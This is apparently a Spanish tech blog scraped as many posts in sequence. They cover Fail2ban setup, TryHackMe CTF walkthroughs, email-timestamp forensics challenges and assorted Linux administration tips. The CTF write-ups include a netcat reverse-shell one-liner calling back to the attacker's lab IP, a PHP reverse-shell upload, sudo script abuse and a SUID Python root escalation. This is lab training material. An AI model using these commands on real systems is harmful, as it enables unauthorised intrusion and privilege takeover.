Aug  1 20:51:37 knock-client knockd: opencloseSSH: running command: /bin/firewall-cmd --zone=public --remove-rich-rule "rule family="ipv4" source address="192.168.122.136" service name="ssh" accept"

Hay que ver cómo está el patio, ¡la máquina encendida llevaba cinco minutos encendida! Así que después de cambiar en el servicio SSH que solo se pueda autenticar mediante claves, lo siguiente ha sido instalar Fail2ban.

Instalación de Fail2ban en CentOS

El primer paso es instalar el repositorio EPEL, si no lo tiene hecho ya, claro.

dnf install epel-repo

Después tenemos que instalar el paquete fail2ban.

dnf install fail2ban

Configuración de Fail2ban

En mi caso, al menos por ahora, voy a dejar la configuración por defecto. En el fichero /etc/fail2ban/jail.conf, está toda la configuración por si queréis modificarla.

Creación de la jaula para SSHD

Hay que crear el fichero que contendrá la configuración de la jaula para el servicio SSHD. Creamos el fichero /etc/fail2ban/jail.d/sshd.local y dentro ponemos el siguiente contenido:

[sshd]
enabled = true

Activación del servicio Fail2ban

Una vez que hemos completado la configuración de Fail2ban, lo siguiente es activar el servicio para que empiece a vigilar por nosotros. 😉

systemctl enable --now fail2ban
Created symlink /etc/systemd/system/multi-user.target.wants/fail2ban.service → /usr/lib/systemd/system/fail2ban.service.

Verificación del estado del servicio Fail2ban

Verificamos que se ha iniciado correctamente con la jaula definida.

fail2ban-client status
Status
|- Number of jail:    1
`- Jail list:    sshd

Comprobamos cómo va la cosa

Dejamos pasar un par de minutos y vamos a ver cuántas IP bloqueadas tenemos.

fail2ban-client get sshd banned
['xxx.xxx.xxx.xxx', 'xx.xx.xx.xxx', 'xx.xx.xxx.xxx', 'xxx.xxx.xxx.xxx', 'xx.xx.xxx.xxx', 'xxx.xxx.xxx.xxx', 'xx.xxx.xxx.xxx', 'xx.xxx.xxx.xx', 'xxx.xxx.xx.xx', 'xx.xx.xxx.xxx']

Lazy Admin

El primer paso es hacer un poco de reconocimiento a ver qué nos encontramos.

nmap

root@kali:~# nmap -sS -p- --min-rate 500 --open -n -Pn 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 16:58 UTC
Nmap scan report for 10.10.188.99
Host is up (0.0071s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:3A:29:AF:90:F3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 5.18 seconds
root@kali:~# 
root@kali:~# nmap -sV -p22 10.10.188.99
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-19 17:05 UTC
Nmap scan report for ip-10-10-188-99.eu-west-1.compute.internal (10.10.188.99)
Host is up (0.00021s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
MAC Address: 02:3A:29:AF:90:F3 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.38 seconds
root@kali:~# 

whatweb

root@kali:~# whatweb http://10.10.188.99 [200 OK] Apache[2.4.18], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.18 (Ubuntu)], IP[10.10.188.99], Title[Apache2 Ubuntu Default Page: It works]
root@kali:~# 

wfuzz

root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.188.99/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.188.99/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                                       
===================================================================

000000689:   301        9 L      28 W     314 Ch      "content"                           

Total time: 27.80658
Processed Requests: 3024
Filtered Requests: 3023
Requests/sec.: 108.7512

root@kali:~# 

What is the user flag?

El primer paso es acceder a la web que publica el servidor a ver qué nos encontramos.

En Exploit Database encontramos una vulnerabilidad que nos dice lo siguiente:

[...]
Proof of Concept :

You can access to all mysql backup and download them from this directory.
http://localhost/inc/mysql_backup
[...]

Accedemos a la ruta y nos encontramos un fichero SQL.

Descargamos el fichero y revisándolo nos encontramos la siguiente línea:

\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\"

Parece que tenemos unas credenciales con un hash MD5 para la contraseña pero lo mejor es confirmarlo.

root@kali:~/Downloads# hash-identifier 
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 42f749ade7f9e195bf475f37a44cafcb

Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))

El siguiente paso será obtener una contraseña de ese hash. La herramienta a utilizar queda al buen entendimiento del lector.

De los datos del wfuzz sabemos que hay una carpeta “/content” y buscando un poco por en el código fuente en GitHub puedes saber que este CMS tiene su web de administración en la carpeta “as”, por lo que la ruta a acceder es “/content/as”

Lo divertido es saber dónde cargar el fichero PHP de la shell inversa. Aquí no queda otra que ir pinchando en las distintas opciones. Yo te ahorro el esfuerzo y te digo que hay que cargarlo desde “Media Center”.

Voy a usar Burp Suite para capturar la llamada POST y poder probar con distintas extensiones de ficheros PHP a ver cuál cuela.

Preparo la sesión de netcat desde el equipo atacante

root@kali:~# netcat -nvlp 4444
listening on [any] 4444 ...
connect to [10.10.34.182] from (UNKNOWN) [10.10.188.99] 47334
Linux THM-Chal 4.15.0-70-generic #79~16.04.1-Ubuntu SMP Tue Nov 12 11:54:29 UTC 2019 i686 i686 i686 GNU/Linux
 20:17:53 up  1:21,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

Ya solo queda ir a por la bandera de usuario.

$ cd /home
$ ls
itguy
$ cd itguy
$ ls
Desktop
Documents
Downloads
Music
Pictures
Public
Templates
Videos
backup.pl
examples.desktop
mysql_login.txt
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 

What is the root flag?

El primer paso es intentar escalar privilegios. Vamos a estabilizar la sesión de shell mediante este comando.

python -c 'import pty;pty.spawn("/bin/bash")'

Ahora ya podemos probar a ver si este usuario puede realizar alguna tarea como root mediante sudo.

$ sudo -l
Matching Defaults entries for www-data on THM-Chal:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on THM-Chal:
    (ALL) NOPASSWD: /usr/bin/perl /home/itguy/backup.pl

Hay un script de Perl que podemos ejecutar pero que no podemos modificar. Vamos a ver si podemos saber qué hace este script.

$ cat backup.pl
#!/usr/bin/perl

system("sh", "/etc/copy.sh");

Ejecuta un fichero llamado “copy.sh” que sí que podemos modificar. Vamos a cambiar su contenido por una shell inversa al equipo atacante.

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.34.182 5554 >/tmp/f' > /etc/copy.sh
$ cat /etc/copy.sh
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.34.182 5554 >/tmp/f

Ejecutamos el script.

$ sudo /usr/bin/perl /home/itguy/backup.pl

Ya solo queda obtener la bandera.

# cd /root
# ls
root.txt
# cat root.txt
{ESTO_NO_TE_LO_PONGO}

Deploy the machine

Bueno esto no tiene mucho misterio, es darle al botón de despliegue y esperar a que arranque.

Reconnaissance

First, let’s get information about the target.

Scan the machine, how many ports are open? What service is running on port 22?

root@kali:~# nmap -sS --min-rate 500 -p- --open -n -Pn 10.10.69.166
Starting Nmap 7.80 ( https://nmap.org ) at 2021-02-20 17:10 UTC
Nmap scan report for 10.10.69.166
Host is up (0.0011s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 02:56:12:EA:16:0D (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 2.97 seconds
root@kali:~# 

What version of Apache is running?

root@kali:~# whatweb 10.10.69.166
http://10.10.69.166 [200 OK] Apache[2.4.29], Cookies[PHPSESSID], Country[RESERVED][ZZ], HTML5, HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.10.69.166], Script, Title[HackIT - Home]
root@kali:~# 

Find directories on the web server using the GoBuster tool.

Yo uso wfuzz. Lo siento, me resulta más comoda esta herramienta.

root@kali:~# wfuzz -c -t 300 --hc=404 -w /usr/share/wordlists/wfuzz/general/big.txt http://10.10.69.166/FUZZ

********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.69.166/FUZZ
Total requests: 3024

===================================================================
ID           Response   Lines    Word     Chars       Payload                             
===================================================================

000000740:   301        9 L      28 W     310 Ch      "css"                               
000001474:   301        9 L      28 W     309 Ch      "js"                               
000001988:   301        9 L      28 W     312 Ch      "panel"                             

Total time: 28.25782
Processed Requests: 3024
Filtered Requests: 3021
Requests/sec.: 107.0146

What is the hidden directory?

Tras revisar los resultados del comando anterior es fácil concluir que la respuesta es /panel/.

Getting a shell

Find a form to upload and get a reverse shell, and find the flag.

He optado por la shell inversa de Pentestmonkey. Hay que editar el fichero y cambiar la IP a la de nuestro equipo atacante y, si se desea, cambiar el puerto.

Al mismo tiempo preparo una sesión de netcat en el equipo atacante para recibir la conexión de la shell inversa.

root@kali:~# rlwrap nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.82.225] from (UNKNOWN) [10.10.69.166] 39068
Linux rootme 4.15.0-112-generic #113-Ubuntu SMP Thu Jul 9 23:41:39 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 17:23:36 up 15 min,  0 users,  load average: 0.00, 0.06, 0.14
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

user.txt

$ ls
html
user.txt
$ cat user.txt
{ESTO_NO_TE_LO_PONGO}
$ 

Privilege escalation

Now that we have a shell, let’s escalate our privileges to root.

Search for files with SUID permission, which file is weird?

Hago una búsqueda ejecutables con SUID y entre los resultados destaca el ejecutable de Python.

$ find / -perm -u=s -type f 2>/dev/null
[...]
/usr/bin/python
[...]

Find a form to escalate your privileges.

Busco la forma de explotar el binario de Python en la web GTFOBins y ejecuto lo siguiente.

$ python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
whoami
root

root.txt

cd /root
ls
root.txt
cat root.txt
{ESTO_NO_TE_LO_PONGO}

El enunciado de esta cuarta parte nos dice lo siguiente:

Based on the information available to you, what is the maximum amount of time Vivian Alyse could have spent composing the final message in the thread that you examined? That is, time elapsed from the moment she pressed the “Reply” or “Forward” button, to the moment she hit “Send”. Assume that the following is true:

Vivian used Outlook to compose and send the message
All of the computers involved in the email conversation keep perfectly accurate time

Enter the duration in minutes rounding up. For example, enter 46 for 45 minutes and 31 seconds.

Este es bastante fácil. Si lo retomamos dónde lo dejamos en el artículo anterior, en la propiedad PR_CONVERSATION_INDEX tenemos unos valores llamados TimeDelta y de estos nos interesa el segundo que es la última respuesta a este correo.


El valor 0x00000AE9 lo tenemos que convertir a decimal y posteriormente a minutos quedando que son 1 minuto y 47 segundos, que redondeando hacia arriba como nos pide el enunciado nos queda el valor de 2 minutos. :checkered_flag:

Y con esto ya hemos terminado este reto. :tada:

El enunciado de esta tercera parte nos dice lo siguiente:

It is believed that the email you examined in Part 1 and Part 2 of this challenge was the last message in a conversation thread that comprises multiple messages. Based on the information available to you, when was the initial message in this conversation thread likely sent?

Enter the timestamp in UTC in the following format: yyyy-mm-dd hh:mm:ss (e.g., 2005-11-20 13:17:48)

Una vez que abrimos el mensaje en Outlook y hacemos clic sobre el botón “iMessage” veremos toda la información interna del fichero incluyendo sus propiedades MAPI. La propiedad que debemos buscar es PR_CONVERSATION_INDEX. Dentro de esta propiedad lo que nos interesa es el campo Value que contiene una cadena hexadecimal de 32 bytes que tenemos que descomponer.


De toda esta estructura lo que nos interesa son los primeros doce caracteres a los que debemos añadir cuatro ceros (0000) en la parte posterior quedando el valor 01D5D17A24E40000 y así completar la longitud de 32 bits.

Si os estáis preguntando qué representa este valor pues os cuento que es el número de nanosegundos que han pasado desde el 1 de enero de 1601 que es lo que se conoce como unidades FILETIME (https://docs.microsoft.com/es-es/office/client-developer/outlook/mapi/filetime).

Lo más rápido para convertir esto a una fecha “humana” es utilizar un conversor de FILETIME como el de la página https://www.epochconverter.com/ldap. Tras convertirlo nos queda la fecha 22 de enero de 2020 a las 23:17:41 que es la respuesta que buscamos. Tan solo queda formatearlo tal y como se nos indica, con lo que la respuesta final es 2020-01-22 23:17:41.

El enunciado de esta segunda parte nos dice lo siguiente:

Regardless of whether you believe it is legitimate or fake, what is the last modification timestamp you were able to find for the attachment in Part 1?

Enter the timestamp in UTC with 0.1 microsecond precision in the following format: yyyy-mm-dd hh:mm:ss.fffffff (e.g., 2005-11-20 13:17:48.1234567)

Recuperamos la salida del script de la primera parte con el siguiente contenido:

┌──(kali㉿kali)-[~/Desktop/msgopen]
└─$ php ex1.php
Message Creation time: 1607983178 => 2020-12-14 16:59:38.000000 EST
Message Last modification time: 1607983178 => 2020-12-14, 16:59:38.000000 EST

Attachment: FC_4fca-8f34_Specs.txt
Attachment creation time: 1591119805 => 2020-06-02 13:43:25.000000 EDT
Attachment last modification time: 1591385420 => 2020-06-05 15:30:20.000000 EDT
┌──(kali㉿kali)-[~/Desktop/msgopen]
└─$ 

Cuidado con el enunciado que nos pide que demos la respuesta en zona horaria UTC y nosotros tenemos la respuesta en EST/EDT. Podríamos modificar el script anterior para que nos muestre las fechas en UTC pero es mucho más rápido “googlear” un poco y averiguar que la diferencia horaria es de 4 horas hacia delante desde EST a UTC y sumarlas obteniendo 2020-06-05 19:30:20.0000000 que es la respuesta solicitada.

El enunciado de esta primera parte nos dice lo siguiente:

You are being asked to examine an email1 between two colleagues within the same corporation. The email contains an important business document known to have been created and maintained on a volume formatted with the NT File System (NTFS).

Based on your examination of the email, are the creation and last modification timestamps of the attachment more likely to be legitimate or fake? Enter L for legitimate, F for fake.

1SHA-256: FB42631EC43891EE2D877E02D911 A1FFB95E9B31825986F09DEFE8B9A55F2614

El primer paso es descargarse el fichero en formato msg. Como siempre usamos el comando sha256sum y comprobamos que el “hash” coincide.

──(kali㉿kali)-[~/Desktop/msgopen]
└─$ sha256sum FW__New_Finite_Curvature_Product_Line_Specs.msg                                                 127 ⨯
fb42631ec43891ee2d877e02d911a1ffb95e9b31825986f09defe8b9a55f2614  FW__New_Finite_Curvature_Product_Line_Specs.msg
                                                                                                                    
┌──(kali㉿kali)-[~/Desktop/msgopen]

El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:

Aquí lo normal sería utilizar alguna herramienta para Windows y poder husmear dentro de las propiedades MAPI del fichero pero como a mí me gusta hacer las cosas al “estilo software libre” voy a usar una librería de PHP llamada hfig/mapi (https://github.com/hfig/MAPI) en un pequeño script. Aquí os dejo su contenido:

<?php
require 'vendor/autoload.php';

use Hfig\MAPI;
use Hfig\MAPI\OLE\Pear;

// message parsing and file IO are kept separate
$messageFactory = new MAPI\MapiMessageFactory();
$documentFactory = new Pear\DocumentFactory(); 

$ole = $documentFactory->createFromFile('FW__New_Finite_Curvature_Product_Line_Specs.msg');
$message = $messageFactory->parseMessage($ole);

$dateToPrint = date_create();
date_timestamp_set($dateToPrint, $message->properties['creation_time']);
echo 'Message Creation time: ', date_format($dateToPrint,'U => Y-m-d H:i:s.u T'), "\n";
date_timestamp_set($dateToPrint, $message->properties['last_modification_time']);
echo 'Message Last modification time: ', date_format($dateToPrint, 'U => Y-m-d, H:i:s.u T'), "\n\n";
foreach ($message->getAttachments() as $attachment) {
  echo 'Attachment: ', $attachment->properties['display_name'], "\n";
  date_timestamp_set($dateToPrint, $attachment->properties['creation_time']);
  echo 'Attachment creation time: ', date_format($dateToPrint,'U => Y-m-d H:i:s.u T'), "\n";
  date_timestamp_set($dateToPrint, $attachment->properties['last_modification_time']);
  echo 'Attachment last modification time: ', date_format($dateToPrint,'U => Y-m-d H:i:s.u T'), "\n";
}
?>

Tras ejecutarlo la salida que muestra es la siguiente:

┌──(kali㉿kali)-[~/Desktop/msgopen]
└─$ php ex1.php
Message Creation time: 1607983178 => 2020-12-14 16:59:38.000000 EST
Message Last modification time: 1607983178 => 2020-12-14, 16:59:38.000000 EST

Attachment: FC_4fca-8f34_Specs.txt
Attachment creation time: 1591119805 => 2020-06-02 13:43:25.000000 EDT
Attachment last modification time: 1591385420 => 2020-06-05 15:30:20.000000 EDT
┌──(kali㉿kali)-[~/Desktop/msgopen]
└─$ 

Aunque no lo pueda demostrar fehacientemente, es bastante probable que se hayan modificado las fechas de creación y modificación de este correo y de sus adjuntos porque es muy poco probable que todas estas acciones se realicen justo en el microsegundo cero.

El enunciado nos dice lo siguiente:

Congrats on making that determination! You are now asked to take this a step further, and determine the earliest date and time the email could have been sent based on the timing information you can locate within the file.

You will be examining the same email1. Included here again for convenience.

1SHA-256: 42B6FD78DAF38C03E1A744ECA1A0CB 44F6859AB892E0F32B01763EFD835B5648

Enter the timestamp in UTC in the following format: yyyy-mm-dd hh:mm (e.g., 2005-11-20 13:17)

Ya nos habíamos descargado el fichero pero si no lo tenemos lo podemos descargar otra vez desde este mismo reto. Como siempre usamos el comando sha256sum y comprobamos que el “hash” coincide.

(kali㉿kali)-[~/Desktop]
└─$ sha256sum Draft_Agreement.eml 
42b6fd78daf38c03e1a744eca1a0cb44f6859ab892e0f32b01763efd835b5648  Draft_Agreement.eml
                                                                           
┌──(kali㉿kali)-[~/Desktop]
└─$ 

El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:

Nos están pidiendo la primera fecha en la que el correo pudo ser enviada. Como ya sabemos del artículo anterior no es posible que podamos obtener ese dato de las cabeceras del correo electrónico, pero si recordáis en el correo había un fichero adjunto llamado “Agreement_v2.pdf”.

──(kali㉿kali)-[~/Desktop]
└─$ grep 'Content-' Draft_Agreement.eml                              130 ⨯
Content-Type: multipart/mixed; 
Content-Length: 70085
Content-Type: multipart/alternative; 
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 7bit
Content-Type: text/html; charset=UTF-8
Content-Transfer-Encoding: 7bit
Content-Type: application/pdf
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Agreement_v2.pdf"
Content-ID: <bd1c0c4c-3c0e-20e0-f6b2-5bc858aab23a@yahoo.com>

Vamos a separarlo utilizando el comando munpack para poder manipularlo. Por cierto, en Kali no viene instalado por defecto y es necesario instalar el paquete mpack.

──(kali㉿kali)-[~/Desktop]
└─$ sudo munpack Draft_Agreement.eml
tempdesc.txt: File exists
)greement_v2.pdf.1 (application/pdf
                                                                           
┌──(kali㉿kali)-[~/Desktop]
└─$ 

Yo no tengo ganas de abrir el fichero porque ya sabemos las cosas malas que se pueden meter en un PDF y además dudo que sea tan sencillo de resolver como visualizar el fichero. Sin embargo, sí hay algo que sabemos de antes que nos puede ayudar. ¿Recordáis la fecha de la versión de Chrome que vimos en la cabecera “X-Mailer”? Pues vamos a rastrear el fichero PDF del adjunto para ver si podemos obtener cadenas de texto que hagan referencia al año 2020 mediante el comando pdf-parser.

(kali㉿kali)-[~/Desktop]
└─$ pdf-parser Agreement_v2.pdf|grep -B10 2020
 Type: /Annot
 Referencing: 46 0 R, 9 0 R

  <<
    /AP
      <<
        /N 46 0 R
      >>
    /C [1.0 1.0 1.0]
    /Contents (Dean Vinny)
    /CreationDate "(D:20201206151800-08'00')"
    /DA (0.898 0.1333 0.2157 rg /Helv 12 Tf)
    /DS (font: Helvetica,sans-serif 12.0pt; text-align:left; color:#E52237 )
    /F 4
    /M "(D:20201206151937-08'00')"

Aquí tenemos dos fechas muy interesantes. Si nos fijamos en el resultado se ve el contenido de una anotación cuyo contenido es el nombre de la persona y además dos fechas casi seguidas. La primera se corresponde con la fecha de creación de la anotación y la segunda con la fecha de la última modificación de esa anotación. Vamos a coger la segunda fecha porque parece difícil que se puede enviar un fichero antes de terminar de editarlo. En esta fecha que fijarse que es necesario calcular la diferencia horaria para sumarla a la hora y con eso ya tendríamos la respuesta, el 6 de diciembre de 2020 a las 23:19.

El enunciado nos dice lo siguiente:

You have received the email1 below in connection with a legal action. The timing of the email is critical. Examine the email and determine if it is more likely to be legitimate or fake.

Enter L for legitimate, F for fake. More to come based on your answer.

SHA-256: 42B6FD78DAF38C03E1A744ECA1A0CB 44F6859AB892E0F32B01763EFD835B5648

Si nos descargamos el fichero EML, el primer paso como siempre es comprobar la suma SHA256. Para ello usamos el comando sha256sum y comprobamos que el “hash” coincide.

(kali㉿kali)-[~/Desktop]
└─$ sha256sum Draft_Agreement.eml 
42b6fd78daf38c03e1a744eca1a0cb44f6859ab892e0f32b01763efd835b5648  Draft_Agreement.eml
                                                                           
┌──(kali㉿kali)-[~/Desktop]
└─$ 

El siguiente paso lógico sería pasar por VirusTotal el fichero para ver si tiene algo raro dentro pero vamos a omitir este paso porque ya sabemos que es algo que todos hacemos antes de abrir un fichero. :wink:

Yo prefiero usar un editor de textos para abrir los ficheros EML y así poder revisar tranquilamente su contenido. En este artículo voy a utilizar el comando grep para simplificar su redacción.

A primera vista las cabeceras que contienen fechas parecen legitimas y están sincronizadas por lo que el correo parece provenir del 7 de marzo de 2016, pero aquí tiene que haber algún truco, no me creo que sea tan sencillo.

──(kali㉿kali)-[~/Desktop]
└─$ grep Mar Draft_Agreement.eml
        Mon, 7 Mar 2016 14:38:34 -0800 (PST)
        Mon, 07 Mar 2016 14:38:34 -0800 (PST)
        Mon, 07 Mar 2016 14:38:34 -0800 (PST)
Received: from sonic.gate.mail.ne1.yahoo.com by sonic306.consmr.mail.bf2.yahoo.com with HTTP; Mon, 7 Mar 2016 22:38:33 +0000
Date: Mon, 7 Mar 2016 22:38:31 +0000 (UTC)

Comprobando el resto de cabeceras vemos que hay una interesante, la que se corresponde con “X-Mailer” que habla de la versión 87.0.4280.67 de Chrome y de Edge basado en Chromium tal y como se puede ver en la siguiente captura.

┌──(kali㉿kali)-[~/Desktop]
└─$ grep 'X-Mailer' Draft_Agreement.eml        
X-Mailer: WebService/1.1.17111 YMailNorrin Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.67 Safari/537.36 Edg/87.0.664.55

Aquí hay algo raro. Si buscamos en Google podemos confirmar que esa versión de Chrome es del 17 de noviembre de 2020, con lo que es imposible que el correo sea del año 2016.

¡Bingo! Ya tenemos la prueba para demostrar que la fecha del correo fue alterada.

Con este pequeño cambio en el fichero /etc/systemd/logind.conf se puede alterar el comportamiento por defecto y, en mi caso, no haga nada. La verdad es que se puede configurar cualquiera de las siguientes cinco opciones:

• HandleLidSwitch=suspend. Suspende el equipo y es el comportamiento por defecto.
• HandleLidSwitch=lock. Bloquea la pantalla.
• HandleLidSwitch=ignore. No hace nada, que sería el comportamiento que yo quiero utilizar.
• HandleLidSwitch=poweroff. Apaga el equipo.
• HandleLidSwitch=hibernate. Hiberna el equipo.

El proceso es sencillo, hay que editar el fichero /etc/systemd/logind.conf con permisos de root y buscar la línea que pone #HandleLidSwitch=suspend y cambiarla por cualquiera de las cinco de arriba según corresponda.


Después solo hay que reiniciar el servicio logind mediante el siguiente comando y ya hemos terminado.

systemctl restart systemd-logind.service

Cannot open /dev/vmmon: No such file or directory. Please make sure that the kernel module `vmmon' is loaded

Esto sucede porque el arranque seguro requiere que estos módulos estén firmados para poder cargarlos y esto no es posible porque estos módulos se compilan durante la instalación del producto. La solución es sencilla pero un poco tediosa porque tendrás que realizarla cada vez que alguno de estos módulos se actualice. Los pasos son los siguientes:

El primer paso es generar el juego de claves mediante openssl que posteriormente se usará para firmar los módulos mediante el siguiente comando:

$openssl req -new -x509 -newkey rsa:2048 -keyout MOK.priv -outform DER -out MOK.der -nodes -days 36500 -subj "/CN=VMware/"

A continuación tienes que firmar los módulos mediante los siguientes comandos:

$sudo /usr/src/linux-headers-`uname -r`/scripts/sign-file sha256 ./MOK.priv ./MOK.der $(modinfo -n vmmon)

$sudo /usr/src/linux-headers-`uname -r`/scripts/sign-file sha256 ./MOK.priv ./MOK.der $(modinfo -n vmnet)

Este paso solo hay que hacerlo la primera vez o cuando se genere un juego de claves nuevo, por ejemplo, si has perdido el anterior. Te solicitará una contraseña para el registro de la clave en la UEFI y que debes recordar.

$mokutil --import MOK.der 

Por último, tienes que reiniciar el equipo y seguir las instrucciones especificas de la UEFI de tu equipo.

Había visto la película de Will Smith y me dije “voy a leerme el libro”. Pues, ¡sorpresa! El libro y la película no se parecen en nada. La película fue entretenida, pero el libro es genial. Se trata de un libro de tamaño medio y de fácil lectura que con un poco de dedicación os podéis terminar en un par de días.

He decidido aprovechar mis conocimientos de Docker para de una vez generar una imagen que me permita con un simple comando disponer del entorno sin más que tener que esperar unos segundos a que se genere la imagen y luego lanzar el contenedor correspondiente.

No es gran cosa, pero ahí os dejo el enlace al repositorio en mi Github por si a alguno le fuera de interés.

Escenario

En nuestro escenario partimos de la presencia de un servidor con dos interfaces de red, la primera en la red 10.0.2.0/24 que tiene la puerta de enlace por defecto en la IP 10.0.2.2, vamos a llamarla “red pública”, y la segunda en la red 192.168.56.20/24, vamos a llamarla “red de gestión”. Queremos que todo el tráfico de la red de gestión se enrute por la segunda interfaz por temas de seguridad.

[root@routes ~]# ip addr show | grep "inet\b" | awk '{print $2" "$NF}'
127.0.0.1/8 lo
10.0.2.15/24 enp0s3
192.168.56.22/24 enp0s8
[root@routes ~]# ip route|grep default
default via 10.0.2.2 dev enp0s3 proto static metric 100 

Instrucciones

Antes de comenzar a configurar PBR, en CentOS 7 es necesario instalar el siguiente paquete:

[root@routes ~]# yum install -y NetworkManager-dispatcher-routing-rules

El siguiente paso es crear la entrada de la política de enrutado:

[root@routes ~]# echo "2 mgt" >> /etc/iproute2/rt_tables

El siguiente paso es crear las reglas para la interfaz enp0s8:

[root@routes ~]# vi /etc/sysconfig/network-scripts/rule-enp0s8
from 192.168.56.22/32 table mgt
to 192.168.56.22/32 table mgt

El siguiente paso es crear la ruta por defecto para la interfaz enp0s8:

[root@routes ~]# vi /etc/sysconfig/network-scripts/route-enp0s8
default via 192.168.56.21 dev enp0s8 table mgt

Una vez configurado todo, tenemos que recargar la configuración para hacerla efectiva:

[root@routes ~]# nmcli connection reload

Comrpobamos que todo está configurado según esperabamos:

[root@routes ~]# ip rule show
0:	from all lookup local 
32764:	from all to 192.168.56.22 lookup mgt
32765:	from 192.168.56.22 lookup mgt 
32766:	from all lookup main 
32767:	from all lookup default
[root@routes ~]# ip route show table mgt
default via 192.168.56.21 dev enp0s8 

Las dos cosas que más me han gustado: su interfaz minimalista y que sea compatible, aparte de MacOS, con GNU/Linux y Windows, que son los dos sistemas operativos con los que trabajo habitualmente.

La verdad es que me ha resultado muy útil sobre todo en mi caso que escribo casi a diario documentación, manuales, etc. Llevo ya tiempo usando Markdown, y aunque es muy sencillo, muchas veces se me hacía complicado imaginar cómo quedaba la composición final y siempre terminaba exportando el documento a HTML o PDF para verificar cómo iba quedando.

Os animo a que lo probéis descargándolo desde su web.

Aspecto visual

El aspecto visual es el mismo de siempre, y esto no es bueno. Está bien tener una interfaz conocida, pero hay que adaptarse a los tiempos y un buen lavado de cara le vendría muy bien.

Mejoras

La nueva versión de Thunderbird trae un buen puñado de mejoras. Vamos a comentarlas brevemente:

• Cuando se está escribiendo un mensaje, un botón de borrado permite eliminar un destinatario. Este botón de borrado se muestra cuando se pone el cursor sobre el selector De/Cc/Cco.
• Más mejoras en el manejo de adjuntos durante la composición, Alt+M permite mostrar el panel de adjuntos.
• Thunderbird ahora permite la conversión de carpetas entre los formatos mbox y maildir y viceversa. De momento, de forma experimental.
• Calendario: Permitir copiar, cortar y borrar una ocurrencia seleccionado o la serie entera de eventos recurrentes.
• Calendario: Proveer una opción para mostrar localizaciones de eventos en las vistas diaria y semanal.
• Calendario: Proveer la habilidad de enviar o no directamente notificaciones de reunión en vez de mostrar una ventana emergente.
• Cuando se está escribiendo una dirección, la parte coincidente de la dirección se muestra en negrita.
• Thunderbird mostrará la opción de compactar las carpetas IMAP incluso si la cuenta está en línea.

Estoy aprovechando para recabar los posts antiguos, darle una nueva imagen y sobre todo, un cambio de plataforma de blogging hacía un entorno lo más sencillo posible que me permita centrarme en escribir y olvidar todo lo demás.

Nos vemos pronto, y gracias por estar ahí.

